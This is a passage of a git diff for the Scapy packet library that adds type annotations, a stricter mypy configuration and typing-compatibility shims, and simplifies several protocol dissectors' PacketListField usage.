scapy/layers/tls/record.py | 2 +- scapy/main.py | 10 +- scapy/packet.py | 481 +++++-- scapy/plist.py | 288 ++-- scapy/utils.py | 7 +- test/dnssecRR.uts | 6 +- 23 files changed, 1978 insertions(+), 686 deletions(-) diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index efe200f0bf7..bf7c8a2d3d1 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -1,5 +1,13 @@ [mypy] +# Internal Scapy modules that we ignore + +[mypy-scapy.modules.six,scapy.modules.six.moves,scapy.libs.winpcapy] +ignore_errors = True +ignore_missing_imports = True + +# External libraries that we ignore + [mypy-IPython] ignore_missing_imports = True @@ -9,13 +17,11 @@ ignore_missing_imports = True [mypy-traitlets.config.loader] ignore_missing_imports = True -[mypy-scapy.modules.six,scapy.modules.six.moves,scapy.libs.winpcapy] -ignore_errors = True -ignore_missing_imports = True - [mypy-pyx] ignore_missing_imports = True [mypy-matplotlib.lines] ignore_missing_imports = True +[mypy-prompt_toolkit.*] +ignore_missing_imports = True diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 0ae1c3c824d..83a45075554 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -37,14 +37,29 @@ # Generate mypy arguments ARGS = [ - "--py2", - "--follow-imports=skip", + # strictness: same as --strict minus --disallow-subclassing-any + "--warn-unused-configs", + "--disallow-any-generics", + "--disallow-untyped-calls", + "--disallow-untyped-defs", + "--disallow-incomplete-defs", + "--check-untyped-defs", + "--disallow-untyped-decorators", + "--no-implicit-optional", + "--warn-redundant-casts", + "--warn-unused-ignores", + "--warn-return-any", + "--no-implicit-reexport", + "--strict-equality", + "--ignore-missing-imports", + # config + "--follow-imports=skip", # Remove eventually "--config-file=" + os.path.abspath( os.path.join( localdir, "mypy.ini" ) - ) + ), ] + [os.path.abspath(f) for f in FILES] # Run mypy over the files diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 6ee1cd1f47e..51696bc46d9 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -6,5 +6,10 @@ scapy/__init__.py scapy/main.py -scapy/contrib/http2.py +# Need fixes that mypy is in strict mode :/ +#scapy/contrib/http2.py +scapy/compat.py +scapy/config.py +scapy/fields.py +scapy/packet.py scapy/plist.py diff --git a/scapy/__init__.py b/scapy/__init__.py index d2a1e43c937..f920151e1e4 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -14,14 +14,11 @@ import re import subprocess -from scapy.compat import AnyStr - - _SCAPY_PKG_DIR = os.path.dirname(__file__) def _version_from_git_describe(): - # type: () -> AnyStr + # type: () -> str """ Read the version from ``git describe``. It returns the latest tag with an optional suffix if the current directory is not exactly on the tag. @@ -49,6 +46,7 @@ def _version_from_git_describe(): raise ValueError('not in scapy git repo') def _git(cmd): + # type: (str) -> str process = subprocess.Popen( cmd.split(), cwd=_SCAPY_PKG_DIR, diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 78dee68054a..4c34ede648c 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -22,6 +22,7 @@ import subprocess import types +from scapy.compat import FAKE_TYPING from scapy.consts import WINDOWS from scapy.modules.six.moves import range @@ -267,12 +268,21 @@ def __call__(cls, *args, **kargs): return i +# Note: see compat.py for an explanation + class Field_metaclass(type): def __new__(cls, name, bases, dct): dct.setdefault("__slots__", []) newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) return newcls + if FAKE_TYPING: + def __getitem__(self, type): + return self + + +PacketList_metaclass = Field_metaclass + class BasePacket(Gen): __slots__ = [] diff --git a/scapy/compat.py b/scapy/compat.py index 72592cb7070..92f4481aa80 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -11,18 +11,135 @@ from __future__ import absolute_import import base64 import binascii +import collections import gzip import struct import sys import scapy.modules.six as six +# Very important: will issue typing errors otherwise +__all__ = [ + # typing + 'Any', + 'AnyStr', + 'Callable', + 'DefaultDict', + 'Dict', + 'Generic', + 'Iterator', + 'List', + 'NoReturn', + 'Optional', + 'Pattern', + 'Set', + 'Sized', + 'Tuple', + 'TypeVar', + 'Union', + 'cast', + 'FAKE_TYPING', + # compat + 'base64_bytes', + 'bytes_base64', + 'bytes_encode', + 'bytes_hex', + 'chb', + 'gzip_compress', + 'gzip_decompress', + 'hex_bytes', + 'lambda_tuple_converter', + 'orb', + 'plain_str', + 'raw', +] + +# Typing compatibility + +# Note: +# supporting typing on multiple python versions is a nightmare. +# Since Python 3.7, Generic is a type instead of a metaclass, +# therefore we can't support both at the same time. Our strategy +# is to only use the typing module if the Python version is >= 3.7 +# and use totally fake replacements otherwise. +# HOWEVER, when using the fake ones, to emulate stub Generic +# fields (e.g. _PacketField[str]) we need to add a fake +# __getitem__ to Field_metaclass + +try: + import typing # noqa: F401 + if sys.version_info[0:2] <= (3, 6): + # Generic is messed up before Python 3.7 + # https://github.com/python/typing/issues/449 + raise ImportError + FAKE_TYPING = False +except ImportError: + FAKE_TYPING = True + +if not FAKE_TYPING: + # Only required if using mypy-lang for static typing + from typing import ( + Any, + AnyStr, + Callable, + DefaultDict, + Dict, + Generic, + Iterator, + List, + NoReturn, + Optional, + Pattern, + Set, + Sized, + Tuple, + TypeVar, + Union, + cast, + ) +else: + # Let's be creative and make some fake ones. + def cast(_type, obj): # type: ignore + return obj + + def _FakeType(name, cls=object): + # type: (str, Optional[type]) -> Any + class _FT(object): + # make the objects subscriptable indefinetly + def __getitem__(self, item): # type: ignore + return cls + return _FT() + + Any = _FakeType("Any") + AnyStr = _FakeType("AnyStr") # type: ignore + Callable = _FakeType("Callable") + DefaultDict = _FakeType("DefaultDict", # type: ignore + collections.defaultdict) + Dict = _FakeType("Dict", dict) # type: ignore + Generic = _FakeType("Generic") + Iterator = _FakeType("Iterator") # type: ignore + List = _FakeType("List", list) # type: ignore + NoReturn = _FakeType("NoReturn") # type: ignore + Optional = _FakeType("Optional") + Pattern = _FakeType("Pattern") # type: ignore + Set = _FakeType("Set", set) # type: ignore + Tuple = _FakeType("Tuple") + TypeVar = lambda x, *args: _FakeType("TypeVar %s" % x) + Union = _FakeType("Union") + + class Sized(object): # type: ignore + pass + + ########### # Python3 # ########### +_CallTupl = TypeVar("_CallTupl", Callable[Ellipsis, Any], None) # type: ignore + def lambda_tuple_converter(func): + # type: (_CallTupl) -> _CallTupl """ Converts a Python 2 function as lambda (x,y): x + y @@ -36,11 +153,17 @@ def lambda_tuple_converter(func): if six.PY2: - bytes_encode = plain_str = str - chb = lambda x: x if isinstance(x, str) else chr(x) - orb = ord + bytes_encode = plain_str = str # type: Callable[[Any], bytes] + orb = ord # type: Callable[[bytes], int] + + def chb(x): + # type: (int) -> bytes + if isinstance(x, str): + return x + return chr(x) def raw(x): + # type: (Any) -> bytes """Builds a packet and returns its bytes representation. This function is and always be cross-version compatible""" if hasattr(x, "__bytes__"): @@ -48,11 +171,13 @@ def raw(x): return bytes(x) else: def raw(x): + # type: (Any) -> bytes """Builds a packet and returns its bytes representation. This function is and always be cross-version compatible""" return bytes(x) def bytes_encode(x): + # type: (Any) -> bytes """Ensure that the given object is bytes. If the parameter is a packet, raw() should be preferred. """ @@ -62,6 +187,7 @@ def bytes_encode(x): if sys.version_info[0:2] <= (3, 4): def plain_str(x): + # type: (AnyStr) -> str """Convert basic byte objects to str""" if isinstance(x, bytes): return x.decode(errors="ignore") @@ -69,16 +195,19 @@ def plain_str(x): else: # Python 3.5+ def plain_str(x): + # type: (Any) -> str """Convert basic byte objects to str""" if isinstance(x, bytes): return x.decode(errors="backslashreplace") return str(x) def chb(x): + # type: (int) -> bytes """Same than chr() but encode as bytes.""" return struct.pack("!B", x) def orb(x): + # type: (Union[int, bytes]) -> int """Return ord(x) when not already an int.""" if isinstance(x, int): return x @@ -86,26 +215,30 @@ def orb(x): def bytes_hex(x): + # type: (AnyStr) -> bytes """Hexify a str or a bytes object""" return binascii.b2a_hex(bytes_encode(x)) def hex_bytes(x): + # type: (AnyStr) -> bytes """De-hexify a str or a byte object""" return binascii.a2b_hex(bytes_encode(x)) def base64_bytes(x): + # type: (AnyStr) -> bytes """Turn base64 into bytes""" if six.PY2: - return base64.decodestring(x) + return base64.decodestring(x) # type: ignore return base64.decodebytes(bytes_encode(x)) def bytes_base64(x): + # type: (AnyStr) -> bytes """Turn bytes into base64""" if six.PY2: - return base64.encodestring(x).replace('\n', '') + return base64.encodestring(x).replace('\n', '') # type: ignore return base64.encodebytes(bytes_encode(x)).replace(b'\n', b'') @@ -121,11 +254,13 @@ def bytes_base64(x): from StringIO import StringIO def gzip_decompress(x): + # type: (AnyStr) -> bytes """Decompress using gzip""" with gzip.GzipFile(fileobj=StringIO(x), mode='rb') as fdesc: return fdesc.read() def gzip_compress(x): + # type: (AnyStr) -> bytes """Compress using gzip""" buf = StringIO() with gzip.GzipFile(fileobj=buf, mode='wb') as fdesc: @@ -134,33 +269,3 @@ def gzip_compress(x): else: gzip_decompress = gzip.decompress gzip_compress = gzip.compress - -# Typing compatibility - -try: - # Only required if using mypy-lang for static typing - from typing import Optional, List, Union, Callable, Any, AnyStr, Tuple, \ - Sized, Dict, Pattern, cast -except ImportError: - # Let's make some fake ones. - - def cast(_type, obj): - return obj - - class _FakeType(object): - # make the objects subscriptable indefinetly - def __getitem__(self, item): - return _FakeType() - - Optional = _FakeType() - Union = _FakeType() - Callable = _FakeType() - List = _FakeType() - Dict = _FakeType() - Any = _FakeType() - AnyStr = _FakeType() - Tuple = _FakeType() - Pattern = _FakeType() - - class Sized(object): - pass diff --git a/scapy/config.py b/scapy/config.py index ccd579bc2a5..569ffb1ea5f 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -9,7 +9,9 @@ from __future__ import absolute_import from __future__ import print_function + import atexit +import copy import functools import os import re @@ -18,11 +20,27 @@ import time import warnings -from scapy import VERSION, base_classes +import scapy +from scapy import VERSION +from scapy.base_classes import Packet_metaclass from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException from scapy.modules import six -from scapy.themes import NoTheme, apply_ipython_style +from scapy.themes import ColorTheme, NoTheme, apply_ipython_style + +from scapy.compat import ( + Any, + Callable, + Dict, + Iterator, + List, + NoReturn, + Optional, + Set, + Tuple, + Union, +) +from types import ModuleType ############ # Config # @@ -31,16 +49,19 @@ class ConfClass(object): def configure(self, cnf): + # type: (ConfClass) -> None self.__dict__ = cnf.__dict__.copy() def __repr__(self): + # type: () -> str return str(self) def __str__(self): + # type: () -> str s = "" - keys = self.__class__.__dict__.copy() - keys.update(self.__dict__) - keys = sorted(keys) + dkeys = self.__class__.__dict__.copy() + dkeys.update(self.__dict__) + keys = sorted(dkeys) for i in keys: if i[0] != "_": r = repr(getattr(self, i)) @@ -53,8 +74,14 @@ def __str__(self): class Interceptor(object): - def __init__(self, name=None, default=None, - hook=None, args=None, kargs=None): + def __init__(self, + name, # type: str + default, # type: Any + hook, # type: Callable[..., Any] + args=None, # type: Optional[List[Any]] + kargs=None # type: Optional[Dict[str, Any]] + ): + # type: (...) -> None self.name = name self.intname = "_intercepted_%s" % name self.default = default @@ -63,22 +90,26 @@ def __init__(self, name=None, default=None, self.kargs = kargs if kargs is not None else {} def __get__(self, obj, typ=None): + # type: (Conf, Optional[type]) -> Any if not hasattr(obj, self.intname): setattr(obj, self.intname, self.default) return getattr(obj, self.intname) @staticmethod def set_from_hook(obj, name, val): + # type: (Conf, str, bool) -> None int_name = "_intercepted_%s" % name setattr(obj, int_name, val) def __set__(self, obj, val): + # type: (Conf, Any) -> None old = getattr(obj, self.intname, self.default) val = self.hook(self.name, val, old, *self.args, **self.kargs) setattr(obj, self.intname, val) def _readonly(name): + # type: (str) -> NoReturn default = Conf.__dict__[name].default Interceptor.set_from_hook(conf, name, default) raise ValueError("Read-only value !") @@ -108,30 +139,37 @@ class ProgPath(ConfClass): class ConfigFieldList: def __init__(self): - self.fields = set() - self.layers = set() + # type: () -> None + self.fields = set() # type: Set[Any] + self.layers = set() # type: Set[Any] @staticmethod def _is_field(f): + # type: (Any) -> bool return hasattr(f, "owners") def _recalc_layer_list(self): + # type: () -> None self.layers = {owner for f in self.fields for owner in f.owners} def add(self, *flds): + # type: (*Any) -> None self.fields |= {f for f in flds if self._is_field(f)} self._recalc_layer_list() def remove(self, *flds): + # type: (*Any) -> None self.fields -= set(flds) self._recalc_layer_list() def __contains__(self, elt): - if isinstance(elt, base_classes.Packet_metaclass): + # type: (Packet_metaclass) -> bool + if isinstance(elt, Packet_metaclass): return elt in self.layers return elt in self.fields def __repr__(self): + # type: () -> str return "<%s [%s]>" % (self.__class__.__name__, " ".join(str(x) for x in self.fields)) # noqa: E501 @@ -145,33 +183,44 @@ class Resolve(ConfigFieldList): class Num2Layer: def __init__(self): - self.num2layer = {} - self.layer2num = {} + # type: () -> None + self.num2layer = {} # type: Dict[int, Packet_metaclass] + self.layer2num = {} # type: Dict[Packet_metaclass, int] def register(self, num, layer): + # type: (int, Packet_metaclass) -> None self.register_num2layer(num, layer) self.register_layer2num(num, layer) def register_num2layer(self, num, layer): + # type: (int, Packet_metaclass) -> None self.num2layer[num] = layer def register_layer2num(self, num, layer): + # type: (int, Packet_metaclass) -> None self.layer2num[layer] = num def __getitem__(self, item): - if isinstance(item, base_classes.Packet_metaclass): + # type: (Union[int, Packet_metaclass]) -> Union[int, Packet_metaclass] + if isinstance(item, Packet_metaclass): return self.layer2num[item] return self.num2layer[item] def __contains__(self, item): - if isinstance(item, base_classes.Packet_metaclass): + # type: (int) -> bool + if isinstance(item, Packet_metaclass): return item in self.layer2num return item in self.num2layer - def get(self, item, default=None): + def get(self, + item, # type: Union[int, Packet_metaclass] + default=None, # type: Optional[Packet_metaclass] + ): + # type: (...) -> Union[int, Packet_metaclass] return self[item] if item in self else default def __repr__(self): + # type: () -> str lst = [] for num, layer in six.iteritems(self.num2layer): if layer in self.layer2num and self.layer2num[layer] == num: @@ -188,25 +237,29 @@ def __repr__(self): return "\n".join(y for x, y in lst) -class LayersList(list): +class LayersList(List[Packet_metaclass]): def __init__(self): + # type: () -> None list.__init__(self) - self.ldict = {} + self.ldict = {} # type: Dict[str, List[Packet_metaclass]] self.filtered = False - self._backup_dict = {} + self._backup_dict = {} # type: Dict[Packet_metaclass, List[Tuple[Dict[str, Any], Packet_metaclass]]] # noqa: E501 def __repr__(self): + # type: () -> str return "\n".join("%-20s: %s" % (layer.__name__, layer.name) for layer in self) def register(self, layer): + # type: (Packet_metaclass) -> None self.append(layer) if layer.__module__ not in self.ldict: self.ldict[layer.__module__] = [] self.ldict[layer.__module__].append(layer) def layers(self): + # type: () -> List[Tuple[str, str]] result = [] # This import may feel useless, but it is required for the eval below import scapy # noqa: F401 @@ -216,6 +269,7 @@ def layers(self): return result def filter(self, items): + # type: (List[Packet_metaclass]) -> None """Disable dissection of unused layers to speed up dissection""" if self.filtered: raise ValueError("Already filtered. Please disable it first") @@ -229,6 +283,7 @@ def filter(self, items): self.filtered = True def unfilter(self): + # type: () -> None """Re-enable dissection for all layers""" if not self.filtered: raise ValueError("Not filtered. Please filter first") @@ -239,8 +294,9 @@ def unfilter(self): self.filtered = False -class CommandsList(list): +class CommandsList(List[Callable]): # type: ignore def __repr__(self): + # type: () -> str s = [] for li in sorted(self, key=lambda x: x.__name__): doc = li.__doc__.split("\n")[0] if li.__doc__ else "--" @@ -248,30 +304,39 @@ def __repr__(self): return "\n".join(s) def register(self, cmd): + # type: (Callable[..., Any]) -> Callable[..., Any] self.append(cmd) return cmd # return cmd so that method can be used as a decorator def lsc(): + # type: () -> None """Displays Scapy's default commands""" print(repr(conf.commands)) -class CacheInstance(dict, object): +class CacheInstance(Dict[str, Any], object): __slots__ = ["timeout", "name", "_timetable", "__dict__"] def __init__(self, name="noname", timeout=None): + # type: (str, Optional[int]) -> None self.timeout = timeout self.name = name - self._timetable = {} + self._timetable = {} # type: Dict[str, float] def flush(self): - self.__init__(name=self.name, timeout=self.timeout) + # type: () -> None + CacheInstance.__init__( + self, + name=self.name, + timeout=self.timeout + ) def __getitem__(self, item): + # type: (str) -> Any if item in self.__slots__: return object.__getattribute__(self, item) - val = dict.__getitem__(self, item) + val = super(CacheInstance, self).__getitem__(item) if self.timeout is not None: t = self._timetable[item] if time.time() - t > self.timeout: @@ -279,6 +344,7 @@ def __getitem__(self, item): return val def get(self, item, default=None): + # type: (str, Optional[Any]) -> Any # overloading this method is needed to force the dict to go through # the timetable check try: @@ -287,12 +353,17 @@ def get(self, item, default=None): return default def __setitem__(self, item, v): + # type: (str, str) -> None if item in self.__slots__: return object.__setattr__(self, item, v) self._timetable[item] = time.time() - dict.__setitem__(self, item, v) + super(CacheInstance, self).__setitem__(item, v) - def update(self, other): + def update(self, # type: ignore + other, # type: Any + **kwargs # type: Any + ): + # type: (...) -> None for key, value in six.iteritems(other): # We only update an element from `other` either if it does # not exist in `self` or if the entry in `self` is older. @@ -301,53 +372,63 @@ def update(self, other): self._timetable[key] = other._timetable[key] def iteritems(self): + # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return six.iteritems(self.__dict__) + return six.iteritems(self.__dict__) # type: ignore t0 = time.time() return ((k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 def iterkeys(self): + # type: () -> Iterator[str] if self.timeout is None: - return six.iterkeys(self.__dict__) + return six.iterkeys(self.__dict__) # type: ignore t0 = time.time() return (k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 def __iter__(self): - return six.iterkeys(self.__dict__) + # type: () -> Iterator[str] + return self.iterkeys() def itervalues(self): + # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return six.itervalues(self.__dict__) + return six.itervalues(self.__dict__) # type: ignore t0 = time.time() return (v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 def items(self): + # type: () -> Any if self.timeout is None: - return dict.items(self) + return super(CacheInstance, self).items() t0 = time.time() return [(k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 def keys(self): + # type: () -> Any if self.timeout is None: - return dict.keys(self) + return super(CacheInstance, self).keys() t0 = time.time() return [k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 def values(self): + # type: () -> Any if self.timeout is None: return list(six.itervalues(self)) t0 = time.time() return [v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 def __len__(self): + # type: () -> int if self.timeout is None: - return dict.__len__(self) + return super(CacheInstance, self).__len__() return len(self.keys()) def summary(self): + # type: () -> str return "%s: %i valid items. Timeout=%rs" % (self.name, len(self), self.timeout) # noqa: E501 def __repr__(self): + # type: () -> str s = [] if self: mk = max(len(k) for k in six.iterkeys(self.__dict__)) @@ -356,23 +437,32 @@ def __repr__(self): s.append(fmt % item) return "\n".join(s) + def copy(self): + # type: () -> CacheInstance + return copy.copy(self) + class NetCache: def __init__(self): - self._caches_list = [] + # type: () -> None + self._caches_list = [] # type: List[CacheInstance] def add_cache(self, cache): + # type: (CacheInstance) -> None self._caches_list.append(cache) setattr(self, cache.name, cache) def new_cache(self, name, timeout=None): + # type: (str, Optional[int]) -> None c = CacheInstance(name=name, timeout=timeout) self.add_cache(c) def __delattr__(self, attr): + # type: (str) -> NoReturn raise AttributeError("Cannot delete attributes") def update(self, other): + # type: (NetCache) -> None for co in other._caches_list: if hasattr(self, co.name): getattr(self, co.name).update(co) @@ -380,14 +470,17 @@ def update(self, other): self.add_cache(co.copy()) def flush(self): + # type: () -> None for c in self._caches_list: c.flush() def __repr__(self): + # type: () -> str return "\n".join(c.summary() for c in self._caches_list) def _version_checker(module, minver): + # type: (ModuleType, Tuple[int, ...]) -> bool """Checks that module has a higher version that minver. params: @@ -396,15 +489,19 @@ def _version_checker(module, minver): """ # We could use LooseVersion, but distutils imports imp which is deprecated version_regexp = r'[a-z]?((?:\d|\.)+\d+)(?:\.dev[0-9]+)?' - version_tags = re.match(version_regexp, module.__version__) - if not version_tags: + version_tags_r = re.match( + version_regexp, + getattr(module, "__version__", "") + ) + if not version_tags_r: return False - version_tags = version_tags.group(1).split(".") - version_tags = tuple(int(x) for x in version_tags) - return version_tags >= minver + version_tags_i = version_tags_r.group(1).split(".") + version_tags = tuple(int(x) for x in version_tags_i) + return bool(version_tags >= minver) def isCryptographyValid(): + # type: () -> bool """ Check if the cryptography module >= 2.0.0 is present. This is the minimum version for most usages in Scapy. @@ -417,6 +514,7 @@ def isCryptographyValid(): def isCryptographyAdvanced(): + # type: () -> bool """ Check if the cryptography module is present, and if it supports X25519, ChaCha20Poly1305 and such. @@ -435,6 +533,7 @@ def isCryptographyAdvanced(): def isPyPy(): + # type: () -> bool """Returns either scapy is running under PyPy or not""" try: import __pypy__ # noqa: F401 @@ -444,6 +543,7 @@ def isPyPy(): def _prompt_changer(attr, val, old): + # type: (str, Any, Any) -> None """Change the current prompt theme""" Interceptor.set_from_hook(conf, attr, val) try: @@ -451,13 +551,16 @@ def _prompt_changer(attr, val, old): except Exception: pass try: - apply_ipython_style(get_ipython()) + apply_ipython_style( + get_ipython() # type: ignore + ) except NameError: pass return getattr(conf, attr, old) def _set_conf_sockets(): + # type: () -> None """Populate the conf.L2Socket and conf.L3Socket according to the various use_* parameters """ @@ -479,7 +582,8 @@ def _set_conf_sockets(): Interceptor.set_from_hook(conf, "use_pcap", False) else: conf.L3socket = L3pcapSocket - conf.L3socket6 = functools.partial(L3pcapSocket, filter="ip6") + conf.L3socket6 = functools.partial( # type: ignore + L3pcapSocket, filter="ip6") conf.L2socket = L2pcapSocket conf.L2listen = L2pcapListenSocket conf.ifaces.reload() @@ -488,7 +592,8 @@ def _set_conf_sockets(): from scapy.arch.bpf.supersocket import L2bpfListenSocket, \ L2bpfSocket, L3bpfSocket conf.L3socket = L3bpfSocket - conf.L3socket6 = functools.partial(L3bpfSocket, filter="ip6") + conf.L3socket6 = functools.partial( # type: ignore + L3bpfSocket, filter="ip6") conf.L2socket = L2bpfSocket conf.L2listen = L2bpfListenSocket conf.ifaces.reload() @@ -496,7 +601,8 @@ def _set_conf_sockets(): if LINUX: from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket conf.L3socket = L3PacketSocket - conf.L3socket6 = functools.partial(L3PacketSocket, filter="ip6") + conf.L3socket6 = functools.partial( # type: ignore + L3PacketSocket, filter="ip6") conf.L2socket = L2Socket conf.L2listen = L2ListenSocket conf.ifaces.reload() @@ -518,6 +624,7 @@ def _set_conf_sockets(): def _socket_changer(attr, val, old): + # type: (str, bool, bool) -> None if not isinstance(val, bool): raise TypeError("This argument should be a boolean") Interceptor.set_from_hook(conf, attr, val) @@ -541,6 +648,7 @@ def _socket_changer(attr, val, old): def _loglevel_changer(attr, val, old): + # type: (str, int, int) -> None """Handle a change of conf.logLevel""" log_scapy.setLevel(val) return val @@ -601,9 +709,10 @@ class Conf(ConfClass): #: spoof on a lan) promisc = True sniff_promisc = 1 #: default mode for sniff() - raw_layer = None + raw_layer = None # type: Packet_metaclass raw_summary = False - default_l2 = None + padding_layer = None # type: Packet_metaclass + default_l2 = None # type: Packet_metaclass l2types = Num2Layer() l3types = Num2Layer() L3socket = None @@ -634,13 +743,15 @@ class Conf(ConfClass): #: holds the Scapy interface list and manager ifaces = None #: holds the cache of interfaces loaded from Libpcap - cache_pcapiflist = {} + cache_iflist = {} # type: Dict[str, Tuple[str, List[str], int]] #: holds the Scapy IPv4 routing table and provides methods to #: manipulate it - route = None # Filed by route.py + route = None # type: 'scapy.route.Route' + # `route` will be filed by route.py #: holds the Scapy IPv6 routing table and provides methods to #: manipulate it - route6 = None # Filed by route6.py + route6 = None # type: 'scapy.route6.Route6' + # 'route6' will be filed by route6.py auto_fragment = True #: raise exception when a packet dissector raises an exception debug_dissector = False @@ -668,9 +779,9 @@ class Conf(ConfClass): ipv6_enabled = socket.has_ipv6 #: path or list of paths where extensions are to be looked for extensions_paths = "." - stats_classic_protocols = [] - stats_dot11_protocols = [] - temp_files = [] + stats_classic_protocols = [] # type: List[Packet_metaclass] + stats_dot11_protocols = [] # type: List[Packet_metaclass] + temp_files = [] # type: List[str] netcache = NetCache() geoip_city = None # can, tls, http are not loaded by default @@ -683,7 +794,7 @@ class Conf(ConfClass): 'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee'] #: a dict which can be used by contrib layers to store local #: configuration - contribs = dict() + contribs = dict() # type: Dict[str, Any] crypto_valid = isCryptographyValid() crypto_valid_advanced = isCryptographyAdvanced() fancy_prompt = True @@ -697,6 +808,7 @@ class Conf(ConfClass): loopback_name = "lo" if LINUX else "lo0" def __getattr__(self, attr): + # type: (str) -> Any # Those are loaded on runtime to avoid import loops if attr == "manufdb": from scapy.data import MANUFDB @@ -732,11 +844,13 @@ def __getattr__(self, attr): def crypto_validator(func): + # type: (Callable[..., Any]) -> Callable[..., Any] """ This a decorator to be used for any method relying on the cryptography library. # noqa: E501 Its behaviour depends on the 'crypto_valid' attribute of the global 'conf'. """ def func_in(*args, **kwargs): + # type: (*Any, **Any) -> Any if not conf.crypto_valid: raise ImportError("Cannot execute crypto-related method! " "Please install python-cryptography v1.7 or later.") # noqa: E501 diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 73452935408..017526ea599 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -278,7 +278,7 @@ class SVK(Packet): ByteField("pad1", 0), LEIntField("prog_milage", 0), StrFixedLenField("pad2", 0, length=5), - PacketListField("entries", [], cls=SVK_Entry, + PacketListField("entries", [], SVK_Entry, count_from=lambda x: x.entries_count)] diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 523de6905f5..8dcf8caf37e 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -463,11 +463,11 @@ class SD(_SDPacketBase): X3BytesField("res", 0), FieldLenField("len_entry_array", None, length_of="entry_array", fmt="!I"), - PacketListField("entry_array", None, cls=_sdentry_class, + PacketListField("entry_array", None, _sdentry_class, length_from=lambda pkt: pkt.len_entry_array), FieldLenField("len_option_array", None, length_of="option_array", fmt="!I"), - PacketListField("option_array", None, cls=_sdoption_class, + PacketListField("option_array", None, _sdoption_class, length_from=lambda pkt: pkt.len_option_array) ] diff --git a/scapy/contrib/eigrp.py b/scapy/contrib/eigrp.py index d91b3152381..8dc03ab93f8 100644 --- a/scapy/contrib/eigrp.py +++ b/scapy/contrib/eigrp.py @@ -47,11 +47,11 @@ from scapy.packet import Packet from scapy.fields import StrField, IPField, XShortField, FieldLenField, \ StrLenField, IntField, ByteEnumField, ByteField, ConditionalField, \ - FlagsField, IP6Field, PacketField, PacketListField, ShortEnumField, \ + FlagsField, IP6Field, PacketListField, ShortEnumField, \ ShortField, StrFixedLenField, ThreeBytesField from scapy.layers.inet import IP, checksum, bind_layers from scapy.layers.inet6 import IPv6 -from scapy.compat import chb, raw +from scapy.compat import chb from scapy.config import conf from scapy.utils import inet_aton, inet_ntoa from scapy.pton_ntop import inet_ntop, inet_pton @@ -449,28 +449,6 @@ class EIGRPv6ExtRoute(EIGRPGeneric): } -class RepeatedTlvListField(PacketListField): - def __init__(self, name, default, cls): - PacketField.__init__(self, name, default, cls) - - def getfield(self, pkt, s): - lst = [] - remain = s - while len(remain) > 0: - p = self.m2i(pkt, remain) - if conf.padding_layer in p: - pad = p[conf.padding_layer] - remain = pad.load - del(pad.underlayer.payload) - else: - remain = b"" - lst.append(p) - return remain, lst - - def addfield(self, pkt, s, val): - return s + b"".join(raw(v) for v in val) - - def _EIGRPGuessPayloadClass(p, **kargs): cls = conf.raw_layer if len(p) >= 2: @@ -504,7 +482,7 @@ class EIGRP(Packet): IntField("seq", 0), IntField("ack", 0), IntField("asn", 100), - RepeatedTlvListField("tlvlist", [], _EIGRPGuessPayloadClass) + PacketListField("tlvlist", [], _EIGRPGuessPayloadClass) ] def post_build(self, p, pay): diff --git a/scapy/contrib/nfs.py b/scapy/contrib/nfs.py index 974adc44af0..79259e39358 100644 --- a/scapy/contrib/nfs.py +++ b/scapy/contrib/nfs.py @@ -442,7 +442,7 @@ class READDIRPLUS_Reply(Packet): ), ConditionalField( PacketListField( - 'files', None, cls=File_From_Dir_Plus, + 'files', None, File_From_Dir_Plus, next_cls_cb=lambda pkt, lst, cur, remain: File_From_Dir_Plus if pkt.value_follows == 1 and (len(lst) == 0 or cur.value_follows == 1) and @@ -722,7 +722,7 @@ class READDIR_Reply(Packet): ), ConditionalField( PacketListField( - 'files', None, cls=File_From_Dir, + 'files', None, File_From_Dir, next_cls_cb=lambda pkt, lst, cur, remain: File_From_Dir if pkt.value_follows == 1 and (len(lst) == 0 or cur.value_follows == 1) and diff --git a/scapy/contrib/portmap.py b/scapy/contrib/portmap.py index 21cf66c4df6..3ed70220dba 100644 --- a/scapy/contrib/portmap.py +++ b/scapy/contrib/portmap.py @@ -73,7 +73,7 @@ class DUMP_Reply(Packet): name = 'PORTMAP DUMP Reply' fields_desc = [ IntField('value_follows', 0), - PacketListField('mappings', [], cls=Map_Entry, + PacketListField('mappings', [], Map_Entry, next_cls_cb=lambda pkt, lst, cur, remain: Map_Entry if pkt.value_follows == 1 and (len(lst) == 0 or cur.value_follows == 1) and diff --git a/scapy/fields.py b/scapy/fields.py index a7ce25d939f..eb8afda6446 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -35,37 +35,58 